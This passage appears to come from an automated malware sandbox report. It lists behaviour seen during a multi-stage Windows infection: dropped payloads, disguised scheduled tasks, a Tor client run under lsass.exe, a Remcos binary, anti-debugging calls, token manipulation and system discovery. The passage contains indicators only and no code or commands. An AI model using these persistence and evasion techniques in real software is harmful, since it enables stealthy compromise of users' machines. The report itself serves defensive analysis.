| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\boleto | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\MicrosoftProfile | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\wod2 | C:\Windows\system32\svchost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
